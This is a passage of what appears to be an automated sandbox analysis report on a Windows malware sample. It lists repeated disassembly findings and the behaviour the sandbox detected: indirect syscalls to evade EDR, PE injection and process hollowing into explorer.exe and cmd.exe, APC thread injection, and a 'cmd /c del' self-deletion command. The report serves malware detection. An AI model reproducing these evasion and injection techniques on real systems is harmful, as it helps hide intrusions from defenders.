          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0181866E mov eax, dword ptr fs:[00000030h]2_2_0181866E
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0181866E mov eax, dword ptr fs:[00000030h]2_2_0181866E
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017DC97C mov eax, dword ptr fs:[00000030h]2_2_017DC97C
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017F4978 mov eax, dword ptr fs:[00000030h]2_2_017F4978
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017F4978 mov eax, dword ptr fs:[00000030h]2_2_017F4978
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01776962 mov eax, dword ptr fs:[00000030h]2_2_01776962
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01776962 mov eax, dword ptr fs:[00000030h]2_2_01776962
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01776962 mov eax, dword ptr fs:[00000030h]2_2_01776962
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0179096E mov eax, dword ptr fs:[00000030h]2_2_0179096E
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0179096E mov edx, dword ptr fs:[00000030h]2_2_0179096E
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0179096E mov eax, dword ptr fs:[00000030h]2_2_0179096E
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D0946 mov eax, dword ptr fs:[00000030h]2_2_017D0946
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0181A9D3 mov eax, dword ptr fs:[00000030h]2_2_0181A9D3
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017E892B mov eax, dword ptr fs:[00000030h]2_2_017E892B
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D892A mov eax, dword ptr fs:[00000030h]2_2_017D892A
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01748918 mov eax, dword ptr fs:[00000030h]2_2_01748918
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01748918 mov eax, dword ptr fs:[00000030h]2_2_01748918
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017DC912 mov eax, dword ptr fs:[00000030h]2_2_017DC912
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017CE908 mov eax, dword ptr fs:[00000030h]2_2_017CE908
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017CE908 mov eax, dword ptr fs:[00000030h]2_2_017CE908
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017829F9 mov eax, dword ptr fs:[00000030h]2_2_017829F9
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017829F9 mov eax, dword ptr fs:[00000030h]2_2_017829F9
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017DE9E0 mov eax, dword ptr fs:[00000030h]2_2_017DE9E0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0175A9D0 mov eax, dword ptr fs:[00000030h]2_2_0175A9D0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0175A9D0 mov eax, dword ptr fs:[00000030h]2_2_0175A9D0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0175A9D0 mov eax, dword ptr fs:[00000030h]2_2_0175A9D0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0175A9D0 mov eax, dword ptr fs:[00000030h]2_2_0175A9D0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0175A9D0 mov eax, dword ptr fs:[00000030h]2_2_0175A9D0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0175A9D0 mov eax, dword ptr fs:[00000030h]2_2_0175A9D0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017849D0 mov eax, dword ptr fs:[00000030h]2_2_017849D0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017E69C0 mov eax, dword ptr fs:[00000030h]2_2_017E69C0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01824940 mov eax, dword ptr fs:[00000030h]2_2_01824940
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D89B3 mov esi, dword ptr fs:[00000030h]2_2_017D89B3
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D89B3 mov eax, dword ptr fs:[00000030h]2_2_017D89B3
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D89B3 mov eax, dword ptr fs:[00000030h]2_2_017D89B3
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017629A0 mov eax, dword ptr fs:[00000030h]2_2_017629A0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017629A0 mov eax, dword ptr fs:[00000030h]2_2_017629A0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017629A0 mov eax, dword ptr fs:[00000030h]2_2_017629A0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017629A0 mov eax, dword ptr fs:[00000030h]2_2_017629A0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017629A0 mov eax, dword ptr fs:[00000030h]2_2_017629A0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017629A0 mov eax, dword ptr fs:[00000030h]2_2_017629A0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017629A0 mov eax, dword ptr fs:[00000030h]2_2_017629A0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017629A0 mov eax, dword ptr fs:[00000030h]2_2_017629A0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017629A0 mov eax, dword ptr fs:[00000030h]2_2_017629A0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017629A0 mov eax, dword ptr fs:[00000030h]2_2_017629A0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017629A0 mov eax, dword ptr fs:[00000030h]2_2_017629A0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017629A0 mov eax, dword ptr fs:[00000030h]2_2_017629A0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017629A0 mov eax, dword ptr fs:[00000030h]2_2_017629A0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017509AD mov eax, dword ptr fs:[00000030h]2_2_017509AD
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017509AD mov eax, dword ptr fs:[00000030h]2_2_017509AD
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017E6870 mov eax, dword ptr fs:[00000030h]2_2_017E6870
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017E6870 mov eax, dword ptr fs:[00000030h]2_2_017E6870
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017DE872 mov eax, dword ptr fs:[00000030h]2_2_017DE872
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017DE872 mov eax, dword ptr fs:[00000030h]2_2_017DE872
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01754859 mov eax, dword ptr fs:[00000030h]2_2_01754859
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01754859 mov eax, dword ptr fs:[00000030h]2_2_01754859
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01780854 mov eax, dword ptr fs:[00000030h]2_2_01780854
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01762840 mov ecx, dword ptr fs:[00000030h]2_2_01762840
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01772835 mov eax, dword ptr fs:[00000030h]2_2_01772835
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01772835 mov eax, dword ptr fs:[00000030h]2_2_01772835
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01772835 mov eax, dword ptr fs:[00000030h]2_2_01772835
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01772835 mov ecx, dword ptr fs:[00000030h]2_2_01772835
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01772835 mov eax, dword ptr fs:[00000030h]2_2_01772835
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01772835 mov eax, dword ptr fs:[00000030h]2_2_01772835
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_018208C0 mov eax, dword ptr fs:[00000030h]2_2_018208C0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017F483A mov eax, dword ptr fs:[00000030h]2_2_017F483A
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017F483A mov eax, dword ptr fs:[00000030h]2_2_017F483A
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0178A830 mov eax, dword ptr fs:[00000030h]2_2_0178A830
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0181A8E4 mov eax, dword ptr fs:[00000030h]2_2_0181A8E4
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017DC810 mov eax, dword ptr fs:[00000030h]2_2_017DC810
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0178C8F9 mov eax, dword ptr fs:[00000030h]2_2_0178C8F9
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0178C8F9 mov eax, dword ptr fs:[00000030h]2_2_0178C8F9
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0177E8C0 mov eax, dword ptr fs:[00000030h]2_2_0177E8C0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017DC89D mov eax, dword ptr fs:[00000030h]2_2_017DC89D
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01750887 mov eax, dword ptr fs:[00000030h]2_2_01750887
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0174CB7E mov eax, dword ptr fs:[00000030h]2_2_0174CB7E
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01748B50 mov eax, dword ptr fs:[00000030h]2_2_01748B50
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017FEB50 mov eax, dword ptr fs:[00000030h]2_2_017FEB50
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01804BB0 mov eax, dword ptr fs:[00000030h]2_2_01804BB0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01804BB0 mov eax, dword ptr fs:[00000030h]2_2_01804BB0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017F8B42 mov eax, dword ptr fs:[00000030h]2_2_017F8B42
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017E6B40 mov eax, dword ptr fs:[00000030h]2_2_017E6B40
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017E6B40 mov eax, dword ptr fs:[00000030h]2_2_017E6B40
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0177EB20 mov eax, dword ptr fs:[00000030h]2_2_0177EB20
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0177EB20 mov eax, dword ptr fs:[00000030h]2_2_0177EB20
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017CEB1D mov eax, dword ptr fs:[00000030h]2_2_017CEB1D
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017CEB1D mov eax, dword ptr fs:[00000030h]2_2_017CEB1D
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017CEB1D mov eax, dword ptr fs:[00000030h]2_2_017CEB1D
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017CEB1D mov eax, dword ptr fs:[00000030h]2_2_017CEB1D
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017CEB1D mov eax, dword ptr fs:[00000030h]2_2_017CEB1D
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017CEB1D mov eax, dword ptr fs:[00000030h]2_2_017CEB1D
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017CEB1D mov eax, dword ptr fs:[00000030h]2_2_017CEB1D
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017CEB1D mov eax, dword ptr fs:[00000030h]2_2_017CEB1D
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017CEB1D mov eax, dword ptr fs:[00000030h]2_2_017CEB1D
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01824B00 mov eax, dword ptr fs:[00000030h]2_2_01824B00
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01758BF0 mov eax, dword ptr fs:[00000030h]2_2_01758BF0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01758BF0 mov eax, dword ptr fs:[00000030h]2_2_01758BF0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01758BF0 mov eax, dword ptr fs:[00000030h]2_2_01758BF0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0177EBFC mov eax, dword ptr fs:[00000030h]2_2_0177EBFC
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017DCBF0 mov eax, dword ptr fs:[00000030h]2_2_017DCBF0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01818B28 mov eax, dword ptr fs:[00000030h]2_2_01818B28
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01818B28 mov eax, dword ptr fs:[00000030h]2_2_01818B28
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017FEBD0 mov eax, dword ptr fs:[00000030h]2_2_017FEBD0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01750BCD mov eax, dword ptr fs:[00000030h]2_2_01750BCD
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01750BCD mov eax, dword ptr fs:[00000030h]2_2_01750BCD
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01750BCD mov eax, dword ptr fs:[00000030h]2_2_01750BCD
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01770BCB mov eax, dword ptr fs:[00000030h]2_2_01770BCB
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01770BCB mov eax, dword ptr fs:[00000030h]2_2_01770BCB
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01770BCB mov eax, dword ptr fs:[00000030h]2_2_01770BCB
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0181AB40 mov eax, dword ptr fs:[00000030h]2_2_0181AB40
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01760BBE mov eax, dword ptr fs:[00000030h]2_2_01760BBE
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01760BBE mov eax, dword ptr fs:[00000030h]2_2_01760BBE
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01804B4B mov eax, dword ptr fs:[00000030h]2_2_01804B4B
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01804B4B mov eax, dword ptr fs:[00000030h]2_2_01804B4B
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01822B57 mov eax, dword ptr fs:[00000030h]2_2_01822B57
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01822B57 mov eax, dword ptr fs:[00000030h]2_2_01822B57
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01822B57 mov eax, dword ptr fs:[00000030h]2_2_01822B57
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01822B57 mov eax, dword ptr fs:[00000030h]2_2_01822B57
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01824A80 mov eax, dword ptr fs:[00000030h]2_2_01824A80
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017CCA72 mov eax, dword ptr fs:[00000030h]2_2_017CCA72
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017CCA72 mov eax, dword ptr fs:[00000030h]2_2_017CCA72
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0178CA6F mov eax, dword ptr fs:[00000030h]2_2_0178CA6F
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0178CA6F mov eax, dword ptr fs:[00000030h]2_2_0178CA6F
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0178CA6F mov eax, dword ptr fs:[00000030h]2_2_0178CA6F
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017FEA60 mov eax, dword ptr fs:[00000030h]2_2_017FEA60
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01756A50 mov eax, dword ptr fs:[00000030h]2_2_01756A50
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01756A50 mov eax, dword ptr fs:[00000030h]2_2_01756A50
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01756A50 mov eax, dword ptr fs:[00000030h]2_2_01756A50
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01756A50 mov eax, dword ptr fs:[00000030h]2_2_01756A50
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01756A50 mov eax, dword ptr fs:[00000030h]2_2_01756A50
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01756A50 mov eax, dword ptr fs:[00000030h]2_2_01756A50
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01756A50 mov eax, dword ptr fs:[00000030h]2_2_01756A50
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01760A5B mov eax, dword ptr fs:[00000030h]2_2_01760A5B
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01760A5B mov eax, dword ptr fs:[00000030h]2_2_01760A5B
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01774A35 mov eax, dword ptr fs:[00000030h]2_2_01774A35
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01774A35 mov eax, dword ptr fs:[00000030h]2_2_01774A35
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0177EA2E mov eax, dword ptr fs:[00000030h]2_2_0177EA2E
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0178CA24 mov eax, dword ptr fs:[00000030h]2_2_0178CA24
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017DCA11 mov eax, dword ptr fs:[00000030h]2_2_017DCA11
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0178AAEE mov eax, dword ptr fs:[00000030h]2_2_0178AAEE
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0178AAEE mov eax, dword ptr fs:[00000030h]2_2_0178AAEE
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01750AD0 mov eax, dword ptr fs:[00000030h]2_2_01750AD0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01784AD0 mov eax, dword ptr fs:[00000030h]2_2_01784AD0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01784AD0 mov eax, dword ptr fs:[00000030h]2_2_01784AD0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017A6ACC mov eax, dword ptr fs:[00000030h]2_2_017A6ACC
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017A6ACC mov eax, dword ptr fs:[00000030h]2_2_017A6ACC
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017A6ACC mov eax, dword ptr fs:[00000030h]2_2_017A6ACC
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01758AA0 mov eax, dword ptr fs:[00000030h]2_2_01758AA0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01758AA0 mov eax, dword ptr fs:[00000030h]2_2_01758AA0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017A6AA4 mov eax, dword ptr fs:[00000030h]2_2_017A6AA4
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01788A90 mov edx, dword ptr fs:[00000030h]2_2_01788A90
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0175EA80 mov eax, dword ptr fs:[00000030h]2_2_0175EA80
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0175EA80 mov eax, dword ptr fs:[00000030h]2_2_0175EA80
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0175EA80 mov eax, dword ptr fs:[00000030h]2_2_0175EA80
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0175EA80 mov eax, dword ptr fs:[00000030h]2_2_0175EA80
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_00256800 GetProcessHeap,RtlFreeHeap,4_2_00256800
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_00256EC0 SetUnhandledExceptionFilter,4_2_00256EC0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_00256B40 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00256B40
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Found direct / indirect Syscall (likely to bypass EDR)
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeNtQueueApcThread: Indirect: 0x160A4F2Jump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeNtClose: Indirect: 0x160A56C
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeMemory written: C:\Users\user\Desktop\n0srYVYMDI.exe base: 400000 value starts with: 4D5AJump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeThread register set: target process: 2580Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeThread register set: target process: 2580Jump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeSection unmapped: C:\Windows\SysWOW64\cmd.exe base address: 240000Jump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeProcess created: C:\Users\user\Desktop\n0srYVYMDI.exe "C:\Users\user\Desktop\n0srYVYMDI.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\n0srYVYMDI.exe"Jump to behavior
          Source: explorer.exe, 00000003.00000003.3107210219.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1727896899.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4169460243.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000002.4169460243.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1725693854.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000003.00000000.1725122365.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4168908689.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman$
          Source: explorer.exe, 00000003.00000002.4169460243.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1725693854.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000003.00000002.4169460243.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1725693854.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
          Source: C:\Windows\SysWOW64\cmd.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc,4_2_00246854
          Source: C:\Windows\SysWOW64\cmd.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,4_2_00248572
          Source: C:\Windows\SysWOW64\cmd.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,4_2_00249310
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Users\user\Desktop\n0srYVYMDI.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
